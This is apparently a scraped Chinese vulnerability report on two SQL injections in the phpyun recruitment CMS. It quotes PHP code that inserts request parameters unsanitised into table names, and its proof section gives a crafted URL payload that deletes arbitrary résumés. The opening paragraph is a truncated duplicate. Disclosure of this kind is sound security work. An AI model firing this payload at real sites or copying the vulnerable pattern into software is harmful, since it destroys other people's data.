VULHUB ™

### 简要描述： phpyun人才系(2015-02-03)Sql注入2枚(可删除任意简历) 无法绕过waf，也就获取不了敏感信息。 ### 详细说明： 代码 /wap/member/model/index.class.php ``` function addresume_action()//复制的较长，可直接略过。 { if($this->config['user_enforce_identitycert']=="1") { $row=$this->obj->DB_select_once("resume","`idcard_pic`<>'' and `uid`='".$this->uid."'"); if($row['idcard_status']!="1") { $data['msg']='请先登录电脑客户端完成身份认证！'; $data['url']='index.php'; } } if($_GET['type']&&intval($_GET['id'])){ $nid=$this->obj->DB_delete_all("resume_".$_GET['type'],"`eid`='".(int)$_GET['eid']."' and `id`='".(int)$_GET['id']."' and `uid`='".$this->uid."'"); if($nid) { $url=$_GET['type']; $this->obj->DB_update_all("user_resume","`$url`=`$url`-1","`eid`='".(int)$_GET['eid']."' and `uid`='".$this->uid."'"); $resume_row=$this->obj->DB_select_once("user_resume","`eid`='".(int)$_GET['eid']."'"); $this->obj->complete($resume_row); $data['msg']='删除成功！'; }else{ $data['msg']='删除失败！'; } $data['url']='index.php?c=addresume&eid='.(int)$_GET['eid']; }...

### 简要描述： phpyun人才系(2015-02-03)Sql注入2枚(可删除任意简历) 无法绕过waf，也就获取不了敏感信息。 ### 详细说明： 代码 /wap/member/model/index.class.php ``` function addresume_action()//复制的较长，可直接略过。 { if($this->config['user_enforce_identitycert']=="1") { $row=$this->obj->DB_select_once("resume","`idcard_pic`<>'' and `uid`='".$this->uid."'"); if($row['idcard_status']!="1") { $data['msg']='请先登录电脑客户端完成身份认证！'; $data['url']='index.php'; } } if($_GET['type']&&intval($_GET['id'])){ $nid=$this->obj->DB_delete_all("resume_".$_GET['type'],"`eid`='".(int)$_GET['eid']."' and `id`='".(int)$_GET['id']."' and `uid`='".$this->uid."'"); if($nid) { $url=$_GET['type']; $this->obj->DB_update_all("user_resume","`$url`=`$url`-1","`eid`='".(int)$_GET['eid']."' and `uid`='".$this->uid."'"); $resume_row=$this->obj->DB_select_once("user_resume","`eid`='".(int)$_GET['eid']."'"); $this->obj->complete($resume_row); $data['msg']='删除成功！'; }else{ $data['msg']='删除失败！'; } $data['url']='index.php?c=addresume&eid='.(int)$_GET['eid']; } if($_POST['submit']){ $_POST=$this->post_trim_iconv($_POST); if($_POST['eid']>0){ $table="resume_".$_POST['table']; $id=(int)$_POST['id']; $url=$_POST['table']; unset($_POST['submit']); unset($_POST['table']); unset($_POST['id']); if($_POST['syear']) { $_POST['sdate']=strtotime($_POST['syear']."-".$_POST['smouth']."-".$_POST['sday']); $_POST['edate']=strtotime($_POST['eyear']."-".$_POST['emouth']."-".$_POST['eday']); unset($_POST['syear']); unset($_POST['smouth']); unset($_POST['sday']); unset($_POST['eyear']); unset($_POST['emouth']); unset($_POST['eday']); } if($id) { $where['id']=$id; $where['uid']=$this->uid; $nid=$this->obj->update_once($table,$_POST,$where); }else{ $_POST['uid']=$this->uid; $nid=$this->obj->insert_into($table,$_POST); $this->obj->DB_update_all("user_resume","`$url`=`$url`+1","`eid`='".(int)$_POST['eid']."' and `uid`='".$this->uid."'"); $resume_row=$this->obj->DB_select_once("user_resume","`eid`='".(int)$_POST['eid']."'"); $this->obj->complete($resume_row); } $nid?$data['msg']='保存成功！':$data['msg']='保存失败！'; $data['url']=$nid?('index.php?c=addresume&eid='.(int)$_POST['eid']):''; $data['msg']=iconv('gbk','utf-8',$data['msg']); echo json_encode($data);die; } else{ if($_POST['name']==""){ $data['msg']='姓名不能为空！'; }else if($_POST['sex']==""){ $data['msg']='性别不能为空！'; }else if($this->config['user_idcard']=="1"&&trim($_POST['idcard'])==""){ $data['msg']='身份证号码不能为空！'; }else if($_POST['living']==""){ $data['msg']='现居住地不能为空！'; }else{ unset($_POST['submit']); $this->obj->delfiledir("..https://images.seebug.org/upload/tel/".$this->uid); $where['uid']=$this->uid; $nid=$this->obj->update_once("resume",$_POST,$where); if($nid){ $this->obj->update_once("member",array('email'=>$_POST['email'],'moblie'=>$_POST['telphone']),$where); $this->obj->member_log("保存基本信息"); $data['msg']='保存成功！'; $data['url']='index.php?c=addresume'; }else{ $data['msg']='保存失败！'; $data['url']='index.php?c=addresume'; } } } } if(!$_GET['eid']&&$_POST['submit']==''){ $num=$this->obj->DB_select_once("member_statis","`uid`='".$this->uid."'"); $maxnum=$this->config['user_number']-$num['resume_num']; $confignum=$this->config['user_number']; if($maxnum<=0 &&$confignum!=""){ $data['msg']='你的简历数已经超过系统设置的简历数了！'; $data['url']='index.php?c=resume'; } }else if($_GET['eid']){ $row=$this->obj->DB_select_once("resume_expect","`id`='".(int)$_GET['eid']."' and `uid`='".$this->uid."'"); include(PLUS_PATH."job.cache.php"); $job_classid=@explode(",",$row['job_classid']); foreach($job_classid as $v){ $jobname[]=$job_name[$v]; } $jobname=@implode(",",$jobname); $this->yunset("row",$row); $this->yunset("jobname",$jobname); $skill=$this->obj->DB_select_all("resume_skill","`eid`='".(int)$_GET['eid']."' and `uid`='".$this->uid."'"); $work=$this->obj->DB_select_all("resume_work","`eid`='".(int)$_GET['eid']."' and `uid`='".$this->uid."'"); $project=$this->obj->DB_select_all("resume_project","`eid`='".(int)$_GET['eid']."' and `uid`='".$this->uid."'"); $edu=$this->obj->DB_select_all("resume_edu","`eid`='".(int)$_GET['eid']."' and `uid`='".$this->uid."'"); $training=$this->obj->DB_select_all("resume_training","`eid`='".(int)$_GET['eid']."' and `uid`='".$this->uid."'"); $cert=$this->obj->DB_select_all("resume_cert","`eid`='".(int)$_GET['eid']."' and `uid`='".$this->uid."'"); $other=$this->obj->DB_select_all("resume_other","`eid`='".(int)$_GET['eid']."' and `uid`='".$this->uid."'"); $this->yunset("skill",$skill); $this->yunset("work",$work); $this->yunset("project",$project); $this->yunset("edu",$edu); $this->yunset("training",$training); $this->yunset("cert",$cert); $this->yunset("other",$other); } $resume=$this->obj->DB_select_once("resume","`uid`='".$this->uid."'"); $this->yunset("resume",$resume); $this->yunset("layer",$data); $CacheArr['user'] =array('userdata','userclass_name'); $CacheArr['job'] =array('job_index','job_type','job_name'); $CacheArr['city'] =array('city_index','city_type','city_name'); $CacheArr['industry'] =array('industry_index','industry_name'); $CacheArr=$this->CacheInclude($CacheArr); $this->waptpl('addresume'); } ``` 这里我们可以看到 。 ``` $nid=$this->obj->DB_delete_all("resume_".$_GET['type'],"`eid`='".(int)$_GET['eid']."' and `id`='".(int)$_GET['id']."' and `uid`='".$this->uid."'"); ``` 这里$_GET[‘type’]直接入库。 我们可以进行注入。 还有这个函数下面的内容 ``` $table="resume_".$_POST['table'];//重点、。。。。。 $id=(int)$_POST['id']; $url=$_POST['table']; unset($_POST['submit']); unset($_POST['table']); unset($_POST['id']); if($_POST['syear']) { $_POST['sdate']=strtotime($_POST['syear']."-".$_POST['smouth']."-".$_POST['sday']); $_POST['edate']=strtotime($_POST['eyear']."-".$_POST['emouth']."-".$_POST['eday']); unset($_POST['syear']); unset($_POST['smouth']); unset($_POST['sday']); unset($_POST['eyear']); unset($_POST['emouth']); unset($_POST['eday']); } if($id) { $where['id']=$id; $where['uid']=$this->uid; $nid=$this->obj->update_once($table,$_POST,$where); ``` 同理的还有下面这个函数 ``` function addresumeson_action() { if($_GET['id']){ $row=$this->obj->DB_select_once("resume_".$_GET['type'],"`id`='".(int)$_GET['id']."' and `uid`='".$this->uid."'");///重点。。。。。 $this->yunset("row",$row); } $this->user_cache(); $this->waptpl('addresumeson'); } ``` ### 漏洞证明： 如何删除任意简历。 简历在库中信息如下 [<img src="https://images.seebug.org/upload/201503/311632570a194cc87a53dd3d82a2898d2aefd7e5.png" alt="图片1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/311632570a194cc87a53dd3d82a2898d2aefd7e5.png) 我们来构造一下type=expect` where id=3# Url ``` http://localhost/phpyun/wap/member/index.php?c=addresume&id=1&type=expect%60%20where%20id%3D3%23 ``` [<img src="https://images.seebug.org/upload/201503/31163450d40b1a5ffcee0cb82831f6c25cc965f4.png" alt="图片3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/31163450d40b1a5ffcee0cb82831f6c25cc965f4.png) [<img src="https://images.seebug.org/upload/201503/311634598420971fe848e95521927af894ecb9ce.png" alt="图片4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/311634598420971fe848e95521927af894ecb9ce.png)